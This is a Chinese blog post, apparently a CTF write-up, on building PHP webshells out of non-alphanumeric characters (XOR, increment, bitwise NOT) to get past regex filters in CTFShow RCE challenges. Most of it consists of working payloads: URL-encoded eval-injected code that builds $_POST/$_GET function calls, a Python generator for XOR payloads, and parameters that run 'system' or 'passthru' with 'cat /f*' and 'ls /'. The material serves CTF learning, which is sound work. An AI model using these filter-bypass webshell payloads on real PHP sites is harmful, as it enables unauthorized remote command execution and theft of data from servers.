前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >从CTFShow[RCE挑战]中学习自增构造webshell

从CTFShow[RCE挑战]中学习自增构造webshell

作者头像
用户9691112
发布2023-05-18 13:37:50
1.1K0
发布2023-05-18 13:37:50
举报

前言

在CTFShow的每周挑战中遇到了PHP无数字字母构造的一系列题目,做了做发现我这个菜鸡不怎么会,所以对此类题进行一个简单总结,希望能对正在学习的师傅有所帮助。

构造语句的几种方式

首先来看一下最原始的例题

代码语言:javascript
复制
<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if(preg_match("/[A-Za-z0-9]+/",$code)){
    die("hacker!");
}
@eval($code);
?>

此时的话只是ban了数字和字母,然后这个时候的话想要构造webshell就需要用其他字符了,然后我们这里的话可以用位运算符中的取反、自增来做这个。

异或

这里需要先讲一点基础知识。 什么是异或,我们这里举一个例子,我们将字符A?进行异或操作

代码语言:javascript
复制
<?php
echo 'A'^'?';
在这里插入图片描述
在这里插入图片描述

可以发现得到的结果是~,那么它是如何计算的呢,过程如下 首先将A?分别转换为对应的ASCII码,A变为65,?变为63 然后将其转换为对应的二进制数,A变为1000001,1变为111111 接下来就进行运算,异或的运算规则是相同为0,不同为1

代码语言:javascript
复制
A:		1000001
1:		0111111(少一位,前面补0即可) 
结果:	1111110

接下来将其二进制转换为对应十进制数,1111110对应的十进制数为126,根据ASCII码表可知126对应的是~,所以这个时候得到的字符就是~。 因此,我们利用这种思路,可以借助异或构造payload如下

代码语言:javascript
复制
$__=("#"^"|"); // _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST 
$$__[_]($$__[__]); // $_POST[_]($_POST[__]);

然后我们再取消一下换行符,将它合并于一行之中

代码语言:javascript
复制
$__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");$$__[_]($$__[__]);

最后进行一次URL编码(因为中间件会进行一次解码,所以我们这里需要手动编码一次),即可得最终payload

代码语言:javascript
复制
%24__%3D(%22%23%22%5E%22%7C%22)%3B%24__.%3D(%22.%22%5E%22~%22)%3B%24__.%3D(%22%2F%22%5E%22%60%22)%3B%24__.%3D(%22%7C%22%5E%22%2F%22)%3B%24__.%3D(%22%7B%22%5E%22%2F%22)%3B%24%24__%5B_%5D(%24%24__%5B__%5D)%3B

接下来本地简单测试一下,测试代码为

代码语言:javascript
复制
<?php
highlight_file(__FILE__);
$code = $_POST['code'];
if(preg_match("/[a-zA-Z0-9]/",$code)){
    die("hacker!");
}
eval($code);
?>
在这里插入图片描述
在这里插入图片描述

但是这种方式如果自己去慢慢找的话,过程是极为缓慢的,想到我们异或一次不仅能构造出一个字符,也可以一次构造出多个字符,比如('AB')^('11')

在这里插入图片描述
在这里插入图片描述

此时就可以得到qs字符串,那我们这里是不是就可以构造一个脚本,通过一次异或运算得到我们想构造的字符串,比如system,那这里的话我们大体思路的话就有了

代码语言:javascript
复制
第一步:寻找未被过滤的字符
第二步:写入我们想构造的字符串,然后对它进行一个遍历,先获取第一个字符
第三步:用刚刚找到的未被过滤的字符进行一个遍历,看哪两个能够通过异或运算构造出第一个字符,同理得到后面的
第四步:输出时将字符进行一个URL编码,因为涉及到了部分不可见字符

这里想到之前在CTFShow命令执行系列中用过一个脚本与此类似,这里简单修改一下脚本,就可以达到我们想要的效果了,脚本如下

代码语言:javascript
复制
import re
import requests
import urllib
from sys import *
import os

a=[]
ans1="" 
ans2=""
for i in range(0,256): #设置i的范围
    c=chr(i)
    #将i转换成ascii对应的字符,并赋值给c
    tmp = re.match(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-',c,re.I)
    #设置过滤条件,让变量c在其中找对应,并利用修饰符过滤大小写,这样可以得到未被过滤的字符
    if(tmp):
        continue
        #当执行正确时,那说明这些是被过滤掉的,所以才会被匹配到,此时我们让他继续执行即可
    else:
        a.append(i)
        #在数组中增加i,这些就是未被系统过滤掉的字符

# eval("echo($c);");
mya="system"  #函数名 这里修改!
myb="dir"      #参数
def myfun(k,my): #自定义函数
    global ans1 #引用全局变量ans1,使得在局部对其进行更改时不会报错
    global ans2 #引用全局变量ans2,使得在局部对其进行更改时不会报错
    for i in range (0,len(a)): #设置循环范围为(0,a)注:a为未被过滤的字符数量 
        for j in range(i,len(a)): #在上个循环的条件下设置j的范围
            if(a[i]^a[j]==ord(my[k])):
                ans1+=chr(a[i]) #ans1=ans1+chr(a[i])
                ans2+=chr(a[j]) #ans2=ans2+chr(a[j])
                return;#返回循环语句中,重新寻找第二个k,这里的话就是寻找y对应的两个字符
for x in range(0,len(mya)): #设置k的范围
    myfun(x,mya)#引用自定义的函数
data1="('"+urllib.request.quote(ans1)+"'^'"+urllib.request.quote(ans2)+"')" #data1等于传入的命令,"+ans1+"是固定格式,这样可以得到变量对应的值,再用'包裹,这样是变量的固定格式,另一个也是如此,两个在进行URL编码后进行按位与运算,然后得到对应值
print(data1)
ans1=""#对ans1进行重新赋值
ans2=""#对ans2进行重新赋值
for k in range(0,len(myb)):#设置k的范围为(0,len(myb))
    myfun(k,myb)#再次引用自定义函数
data2="(\""+urllib.request.quote(ans1)+"\"^\""+urllib.request.quote(ans2)+"\")"
print(data2)
在这里插入图片描述
在这里插入图片描述

接下来去尝试一下

在这里插入图片描述
在这里插入图片描述

自增

https://www.php.net/manual/zh/language.operators.increment.php当我们通过某种方法可以得到一个字符时,我们就可以通过自增来获取其他字符,比如现在我们获取到了_=A,我们进行_++,此时

代码语言:javascript
复制
<?php
highlight_file(__FILE__);
$code = $_POST['code'];
if(preg_match("/[A-Za-z0-9]+/",$code)){
    die("hacker!");
}
@eval($code);
?>

我们首先可以写一个[]看一下

代码语言:javascript
复制
<?php
$_=[];
var_dump($_);
在这里插入图片描述
在这里插入图片描述

这个时候的话可以看到它就是一个数组,我们无法获取它的这个Array字符,那我们该怎么获取呢,我们尝试拼接一个数字

代码语言:javascript
复制
<?php
$_=[].'1';
var_dump($_);
在这里插入图片描述
在这里插入图片描述

这里看到输出的是Array1,我们这里是不允许出现数字的,但我们直接拼接个空是不是也是可行的呢,尝试一下

代码语言:javascript
复制
<?php
$_=[].'';
var_dump($_);

成功获取到了字符Array,然后我们获取想获取A的话,就可以采用_[0]这种方式来获取,但我们是不能够写数字的,所以我们这里可以用一个判断,比如我们在[]里加一个==,此时因为空和不同,它就会输出0,此时也就等同于_[0],具体实现代码如下

代码语言:javascript
复制
<?php
$_=[];
$_=$_[''=='$'];
echo $_;
在这里插入图片描述
在这里插入图片描述

此时成功获取到了字符A,有了A,我们就可以通过自增依次获取其他字符,我们尝试获取一个字符G

代码语言:javascript
复制
<?php
$_=[];//Array
$_=$_[''=='$'];//A
$_++;//B
$_++;//C
$_++;//D
$_++;//E
$_++;//F
$_++;//G
var_dump($_);

然后看我们这里的代码的话,是eval(code),所以我们就可以构造这种的_GET[1](

代码语言:javascript
复制
<?php
$_=[].'';//Array
$_=$_[''=='$'];//A
$_++;//B
$_++;//C
$_++;//D
$_++;//E
$__=$_;//E
$_++;//F
$_++;//G
$___=$_;//G
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;//T
$_=$___.$__.$_;//GET
//var_dump($_);
$_='_'.$_;//_GET
var_dump($$_[_]($$_[__]));
//$_GET[_]($_GET[__])

接下来就可以尝试去给___GET传参,这里我们需要把换行的都去掉,然后进行一次URL编码,因为中间件会解码一次,所以我们构造的payload先变成这样

代码语言:javascript
复制
$_=[].'';$_=$_[''=='$'];$_++;$_++;$_++;$_++;$__=$_;$_++;$_++;$___=$_;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_=$___.$__.$_;$_='_'.$_;$$_[_]($$_[__]);

而后变成

代码语言:javascript
复制
%24_%3D%5B%5D.''%3B%24_%3D%24_%5B''%3D%3D'%24'%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24___%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24___.%24__.%24_%3B%24_%3D'_'.%24_%3B%24%24_%5B_%5D(%24%24_%5B__%5D)%3B

此时去尝试赋值

在这里插入图片描述
在这里插入图片描述

成功执行了命令,输出了当前目录

取反

这个的话我们这里其实是利用了不可见字符,我们对一个字符进行两次取反,得到的还是其本身。当我们进行一次取反过后,对其进行URL编码,再对其进行取反,此时可以得到可见的字符,它的本质其实还是这个字符本身,然后因为取反用的多是不可见字符,所以这里就达到了一种绕过的目的。

这里的话利用一个php脚本即可获取我们想要的字符

代码语言:javascript
复制
<?php
$ans1='system';//函数名
$ans2='dir';//命令
$data1=('~'.urlencode(~$ans1));//通过两次取反运算得到system
$data2=('~'.urlencode(~$ans2));//通过两次取反运算得到dir
echo ('('.$data1.')'.'('.$data2.')'.';');
在这里插入图片描述
在这里插入图片描述

接下来为例尝试一下

代码语言:javascript
复制
<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if(preg_match("/[a-zA-Z0-9]/",$code)){
    die("hacker!");
}
eval($code);
?>
在这里插入图片描述
在这里插入图片描述

关于自增的一些知识点

知识点1

在自增中,可以通过特殊字符构造出字符串的有以下几种方式

代码语言:javascript
复制
[].''  //Array
(0/0).''   //NAN
(1/0).''   //INF

这个时候就有一个问题了,如果ban了数字,我们该怎么去构造NANINF呢,这个时候就需要讲到一个知识点,我们这里的话需要说一下这个NANINF

代码语言:javascript
复制
NaN(Not a Number,非数)是计算机科学中数值数据类型的一类值,表示未定义或不可表示的值。常在浮点数运算中使用。首次引入NaN的是1985年的IEEE 754浮点数标准。

INF:infinite,表示“无穷大”。 超出浮点数的表示范围(溢出,即阶码部分超过其能表示的最大值)。

这里可以看出NAN表示的是未被定义的值,所以我们这里可以通过a/a这种方式构造,如果字母也被ban,我们也可以借助其他字符,比如_/_,这个时候也可以得到NAN,同理,INF也可以通过1/a的方式获取。

知识点2

这里需要说明一下,笔者小白,对这个不太了解,然后可能这并不算什么知识点,还请各位大师傅多多担待

我们在构造_POST中的_时,正常操作的话是这样,a='_'.b(假设这里b就是POST),然后这个时候如果'被ban,看似这里是无法再利用了,但其实,我们直接写a=_.b也是可以的,这个时候效果同上而且缩短了字符长度。

CTF赛题实战

CTFshow吃瓜杯[shellme_Revenge]

题目环境如下 https://ctf.show/challenges#shellme_Revenge-1483 进入环境后发现phpinfo(),找找有没有什么信息

搜索hint后发现

在这里插入图片描述
在这里插入图片描述

提示了?looklook,那我们这里可以猜出大概率是给了个访问的参数,我们在URL后加上?looklook=1,此时获取到源码

代码语言:javascript
复制
<?php
error_reporting(0);
if ($_GET['looklook']){
    highlight_file(__FILE__);
}else{
    setcookie("hint", "?looklook", time()+3600);
}
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
        if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("fucccc hacker!!");
        }
    }
} else {
    phpinfo();
}
?>

过滤了很多,^和~被过滤,所以异或和取反不可行,但可用的还有一些字符, _ 1 2 3 C这几个均未被过滤,所以我们这里可以尝试一下通过自增构造,这里限制了长度,要求长度小于107,所以我们这里的话使用构造较短的payload,_GET[0](

代码语言:javascript
复制
<?php
$_=C;
$_++;//D
$C1=++$_;//E
$_++;//F
$C=++$_.$C1;//GE
$_=(C/C.C)[0];//C/C即可得到NAN,但此时的它不是字符串,需要拼接一个字符才能变成字符串,然后第一位就是N
$_++;//O
$_++;//P
$_++;//Q
$_++;//R
$_++;//S
$_++;//T
$C=_.$C.$_;
$$C[1]($$C[2]);
var_dump($C);//$_GET[0]($GET[1])

我这里说一下这里缩短长度的几个点,首先一个就是获取字母,比如获取字符E那里,之前我写的话都是_++;C1=_,这种相对来说长度就比较长了,当我们直接这样写,即C1=++_时,此时不仅C1被赋值为E,同时_也进行了一次自增,因为++_是先做运算,再赋值的,所以这里是一个缩短长度的点。然后第二个就是获取T这个字符,我们知道T在英语字母中是较靠后的,如果从前靠后只靠自增,字符就过长了,我们这里想到NAN这个字符N是离T较近的,所以我们可以尝试构造N然后再自增获取T,了解到0/0是NAN,这里的C/C也就是NAN,所以我们对他进行一个拼接后获取第一个字符就可以得到N,而后再通过自增即可获取T。第三个点的话就是拼接_GET处,这里的_不用单引号直接拼接也是可以的,这样就省去了两个字符。

接下来将刚刚构造的payload删去换行这些,然后弄到一行后再进行URL编码,最终payload

代码语言:javascript
复制
GET:
1=passthru&2=ls /
POST:
ctf_show=%24_%3DC%3B%24_%2B%2B%3B%24C1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24C%3D%2B%2B%24_.%24C1%3B%24_%3D(C%2FC.C)%5B0%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24C%3D_.%24C.%24_%3B%24%24C%5B1%5D(%24%24C%5B2%5D)%3B
在这里插入图片描述
在这里插入图片描述

成功执行ls /命令,接下来读flag即可

在这里插入图片描述
在这里插入图片描述

CTFShow[RCE挑战2]

环境如下 https://ctf.show/challenges#RCE2 进入靶场,代码如下

代码语言:javascript
复制
<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow)) {
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

这里的话可以看到$[]'以及_这几个字符是没有被ban的,所以这里我们可以同之前一样,以自增方式构造命令执行语句,直接利用上面的payload进行尝试

代码语言:javascript
复制
GET:
_=system&__=cat /f*
POST:
%24_%3D%5B%5D.''%3B%24_%3D%24_%5B''%3D%3D'%24'%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24___%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24___.%24__.%24_%3B%24_%3D'_'.%24_%3B%24%24_%5B_%5D(%24%24_%5B__%5D)%3B
在这里插入图片描述
在这里插入图片描述

CTFShow[RCE挑战3]

代码语言:javascript
复制
<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 105) {
        if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

这里限制了长度为105,然后看过滤的话这里的^和~被ban,所以继续用自增,然后这个时候考虑的_GET中的T字符相对G和E来说是较靠后的,如果用自增获取会占用很多字符,所以这里可以去尝试构造_POST,这四个字符相对来说还是挨的比较近的,所以我这里打算构造的语句是_POST[0](_POST[1]),接下来我们就可以去构造了。

首先的话,我们考虑到这个POST四个字符都是偏后的,同时我们这里是有数字0的,所以我们这里可以用0/0来获取float(NAN),接下来需要把他转换为字符串,因为这个是无法利用的,然后我们这里可以看到'"都被ban了,所以不能再用,不过我们这里拼接的话,其实随便拼接个什么都可以,我们这里拼接一个下划线也是可以的,所以第一步就有了

代码语言:javascript
复制
<?php
$_=(0/0)._;//NAN
$_=$_[0];//N

这个时候就成功获取到了字符N,接下来就是先进行赋值获取一个_,然后再通过自增获取POST,最终的话得到的payload如下

代码语言:javascript
复制
<?php
$_=(0/0)._;//NAN
$_=$_[0];//N
$_1=++$_;//O  ++$_是先进行自增,而后取值,所以这里$_1就是O
$__=_;//_  首先获取_
$__.=++$_;//_P  通过自增获取P 
$__.=$_1;//_PO  获取O
$_++;//Q 
$_++;//R
$__.=++$_;//_POS 通过自增获取S
$__.=++$_;//_POST  通过自增获取T
$$__[0]($$__[1]);//$_POST[0]($_POST[1])

接下来将代码放入一行

代码语言:javascript
复制
$_=(0/0)._;$_=$_[0];$_1=++$_;$__=_;$__.=++$_;$__.=$_1;$_++;$_++;$__.=++$_;$__.=++$_;$$__[0]($$__[1]);
在这里插入图片描述
在这里插入图片描述

可以看到这里是103,小于105,接下来进行URL编码,然后去环境里尝试一下

在这里插入图片描述
在这里插入图片描述

成功执行ls /命令

在这里插入图片描述
在这里插入图片描述

CTFShow[RCE挑战4]

源码如下

代码语言:javascript
复制
<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 84) {
        if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

可以看到本题进一步限制了长度,要求长度小于84位,然后这里的话需要说一些缩短长度的方法。首先就是我们之前得到字符N是这样的,_=(0/0)._;_=_[0];,然后这个的话我们其实是可以进行一个缩短的,我们可以写成这个样子_0=(_/_._)[0];,这个(_/_._)就可以直接得到NAN,然后我们再加上一个[0],就可以缩短长度然后其他就是对自增这些进行一下缩短,我构造的payload如下

代码语言:javascript
复制
<?php
$_0=(_/_._)[0];//NAN
$_=++$_0;//O
$__=_;//_
$__.=++$_.$_0;//_P
$_++;//Q
$_++;//R
$__.=++$_;//_POS
$__.=++$_;//_POST
$$__[0]($$__[_]);//$_POST[0]($_POST[_])

可是这个时候当我把他放到一行中,我发现它的长度是91,还是大于84,因此这个是不可用的,这个时候看到变量名_0和__占了两个单位长度,如果我们可以用一个字符来表示它,是不是就可以成功缩短长度呢,然后这个时候就考虑到可以使用不可见字符然后我们在URL编码表中随便找两个,我这里就用%DE和%DF了,然后分别对变量名进行一个替换

代码语言:javascript
复制
<?php_
$%DF=(_/_._)[0];//NAN
$_=++$%DF;//O
$%DE=_;//_
$%DE.=++$_.$%DF;//_P
$_++;//Q
$_++;//R
$%DE.=++$_;//_POS
$%DE.=++$_;//_POST
$$%DE[0]($$%DE[_]);//$_POST[0]($_POST[_])

然后接下来写到一行中

代码语言:javascript
复制
$%DF=(_/_._)[0];$_=++$%DF;$%DE=_;$%DE.=++$_.$%DF;$_++;$_++;$%DE.=++$_;$%DE.=++$_;$$%DE[0]($$%DE[_]);

因为涉及到不可见字符,然后它是URL编码过的,所以我们这里不能使用整体编码,需要单独对部分内容进行URL编码,不过这里需要编码的也就是++,对++URL编码即可,因此最终payload如下

代码语言:javascript
复制
POST:
$%DF=(_/_._)[0];$_=%2B%2B$%DF;$%DE=_;$%DE.=%2B%2B$_.$%DF;$_%2B%2B;$_%2B%2B;$%DE.=%2B%2B$_;$%DE.=%2B%2B$_;$$%DE[0]($$%DE[_]);&0=system&_=cat /f*
在这里插入图片描述
在这里插入图片描述

CTFShow[RCE挑战5]

源码如下

代码语言:javascript
复制
<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 73) {
        if (!preg_match("/[a-zA-Z0-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

这里的话将数字全ban了,同时要求字符串长度小于73 然后这里的话根本没思路,参考过官方wp后,得知当gettext拓展开启时,_()就相当于gettext(),可以获取其中的内容,所以我们这里可以通过这种方式获取到字符N,然后我们构造的payload如下

代码语言:javascript
复制
<?php
$a=_(a/a)[a];//N
$_=++$a;//O
$b=_.++$a.$_;//_PO
$a++;//Q
$a++;//R
$b.=++$a.++$a;//_POST
$$b[a]($$b[_]);//$_POST[a]($_POST[_])

接下来用不可见字符分别替换ab,然后放至一行之中,得到

代码语言:javascript
复制
$%DE=_(%DE/%DE)[%DE];$_=++$%DE;$%DF=_.++$%DE.$_;$%DE++;$%DE++;$%DF.=++$%DE.++$%DE;$$%DF[%DE]($$%DF[_]);

再对++进行URL编码,得到

代码语言:javascript
复制
$%DE=_(%DE/%DE)[%DE];$_=%2B%2B$%DE;$%DF=_.%2B%2B$%DE.$_;$%DE%2B%2B;$%DE%2B%2B;$%DF.=%2B%2B$%DE.%2B%2B$%DE;$$%DF[%DE]($$%DF[_]);
在这里插入图片描述
在这里插入图片描述

成功获取flag

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-12-07 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 构造语句的几种方式
    • 异或
      • 自增
        • 取反
        • 关于自增的一些知识点
          • 知识点1
            • 知识点2
            • CTF赛题实战
              • CTFshow吃瓜杯[shellme_Revenge]
                • CTFShow[RCE挑战2]
                  • CTFShow[RCE挑战3]
                    • CTFShow[RCE挑战4]
                      • CTFShow[RCE挑战5]
                      相关产品与服务
                      消息队列 TDMQ
                      消息队列 TDMQ (Tencent Distributed Message Queue)是腾讯基于 Apache Pulsar 自研的一个云原生消息中间件系列,其中包含兼容Pulsar、RabbitMQ、RocketMQ 等协议的消息队列子产品,得益于其底层计算与存储分离的架构,TDMQ 具备良好的弹性伸缩以及故障恢复能力。
                      领券
                      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档